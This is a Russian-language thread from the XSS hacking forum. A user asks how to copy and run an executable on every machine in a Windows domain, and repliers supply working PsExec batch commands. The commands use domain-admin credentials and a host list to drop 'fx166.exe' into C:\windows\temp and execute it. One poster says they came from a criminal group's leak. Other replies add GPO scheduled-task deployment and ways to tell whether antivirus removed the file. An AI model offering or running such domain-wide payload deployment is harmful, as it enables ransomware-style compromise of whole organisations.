• XSS.stack #1 – первый литературный журнал от юзеров форума

Скрипт для групповой политики

sect adept

(L3) cache
Пользователь
Регистрация
19.02.2022
Сообщения
280
Решения
3
Реакции
73
Всех приветствую. Иногда не удобно и не быстро мне приходится работать с GPO, а именно раскидывать файл по домену и запускать. Связано с тем, что разные языки, и приходится вникать в каждую строку. Может быть есть способ такого деяния через cmd или PowerShell? Буду признателен, если подскажите
 
Через шару не особо понял как запускать. Мы кладем файл в шару, далее через пёсика запускаем, с кредами ДА, на всех хостах исполнение этого файла?
 
Через шару не особо понял как запускать. Мы кладем файл в шару, далее через пёсика запускаем, с кредами ДА, на всех хостах исполнение этого файла?
шару на dc расшариваешь, делаешь батник со списком машин , и фаил .ps1 со криптом и кладешь psexec. запускаешь псекзек а после батник
 
логика такая через батник запускается cmd поднимает сессии через псекзек на таргетах и исполняет локально скрипт на каждом таргете который лежи в сетевой папке /шаре
 
можно и ехе фаил раскидать и запустить на каждой тачке ворос в ав
Вот да, меня АВ беспокоят на хостах. Просто как-то не камельфо заходить на каждый хост и чекать АВ (тогда и смысл разброса файла пропадает). Правильно я понял, что на ДС расшариваем папку, в нее кладем ехе, создаю батник с адресами хостов и через пёсика запускаю на каждом хосте ехешник, который в шаре?
 
Вот да, меня АВ беспокоят на хостах. Просто как-то не камельфо заходить на каждый хост и чекать АВ (тогда и смысл разброса файла пропадает). Правильно я понял, что на ДС расшариваем папку, в нее кладем ехе, создаю батник с адресами хостов и через пёсика запускаю на каждом хосте ехешник, который в шаре?
ну ты псэкзек запустил вначале от админа а потом просто батник запускаешь и батник сам уже через псэкзец поднимает сессии
 
ну ты псэкзек запустил вначале от админа а потом просто батник запускаешь и батник сам уже через псэкзец поднимает сессии
Спасибо за ответ. Обязательно попробую и отпишу сюда по результату, как будет возможность
 
Батник копирования по всему домене
Код:
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe" "C:\windows\temp\"
Сохраняем как "copy.bat"

Батник для запуска по всему домену
Код:
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe
Сохраняем "run.bat"

Откопал такую штуку от известного слива одних чебуреков)))
 
Батник копирования по всему домене
Код:
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe" "C:\windows\temp\"
Сохраняем как "copy.bat"

Батник для запуска по всему домену
Код:
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe
Сохраняем "run.bat"

Откопал такую штуку от известного слива одних чебуреков)))
ага именно так
 
Батник копирования по всему домене
Код:
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe" "C:\windows\temp\"
Сохраняем как "copy.bat"

Батник для запуска по всему домену
Код:
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe
Сохраняем "run.bat"

Откопал такую штуку от известного слива одних чебуреков)))
Самому не судьба посмотреть параметры для пски? их не так много.
Если запускаеш екзешник с шары не копируя его на хост просто пишеш батник и перед екзешником в батнике пишешь %~dp0 это будет указывать на путь к екзешнику для запуска, стестно его на шару надо положить с батником. если его запустить через psexec будет выглядеть так
PsExec.exe -d @ip.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c \\192.168.1.1\share\1.bat
 
Батник копирования по всему домене

Самому не судьба посмотреть параметры для пски? их не так много.
Если запускаеш екзешник с шары не копируя его на хост просто пишеш батник и перед екзешником в батнике пишешь %~dp0 это будет указывать на путь к екзешнику для запуска, стестно его на шару надо положить с батником. если его запустить через psexec будет выглядеть так
Спасибо за ответ, все понял, кроме %~dp0 - dp0 это название ехе?
 
Это путь(параметр) задаёт путь откуда запускать exe пишеш например в батнике %~dp0SOFT.exe
и при запуске батника
PsExec.exe -d @ip.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c \\192.168.1.1\share\1.bat Батник будет брать путь для запуска с \\192.168.1.1\share\SOFT.exe
У себя на пк попробуй поймёшь.
 
Вот да, меня АВ беспокоят на хостах. Просто как-то не камельфо заходить на каждый хост и чекать АВ (тогда и смысл разброса файла пропадает). Правильно я понял, что на ДС расшариваем папку, в нее кладем ехе, создаю батник с адресами хостов и через пёсика запускаю на каждом хосте ехешник, который в шаре?
Ты можешь создать задачу в планировщике ГПО, по запуску. так же разместить можно через задачи, в чем приимущество, если новые ПК появляются в сети, они обновляют ГПО и выпалняют твой таск. Что касается АВ, для понимания можешь запустить условный remote process explorer и почекать что к чему запущено, либо рандомно тасклистом пройдись, дальше все также. Недостаток, в случае отъеба ДК, все остановится, поэтому рекомендую шару делать не на ДК и политики обновить сразу, тоесть надо делать "на верочку". Что касается псэкзека, то не обязательно шарить файл, ты можешь использовать -c в команде для копирования файла из места с которого запускаешь, так же если АВ отъебнет запуск ты увидишь сообщение типа что файл не найден, значит АВ его грохнул после копирования, так же не рекомендую юзать псэкзек с ДК, лучше с левого под ДА зайти и раскидать
 
Ты можешь создать задачу в планировщике ГПО, по запуску. так же разместить можно через задачи, в чем приимущество, если новые ПК появляются в сети, они обновляют ГПО и выпалняют твой таск. Что касается АВ, для понимания можешь запустить условный remote process explorer и почекать что к чему запущено, либо рандомно тасклистом пройдись, дальше все также. Недостаток, в случае отъеба ДК, все остановится, поэтому рекомендую шару делать не на ДК и политики обновить сразу, тоесть надо делать "на верочку". Что касается псэкзека, то не обязательно шарить файл, ты можешь использовать -c в команде для копирования файла из места с которого запускаешь, так же если АВ отъебнет запуск ты увидишь сообщение типа что файл не найден, значит АВ его грохнул после копирования, так же не рекомендую юзать псэкзек с ДК, лучше с левого под ДА зайти и раскидать
Спасибо за ответ, учту это все)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх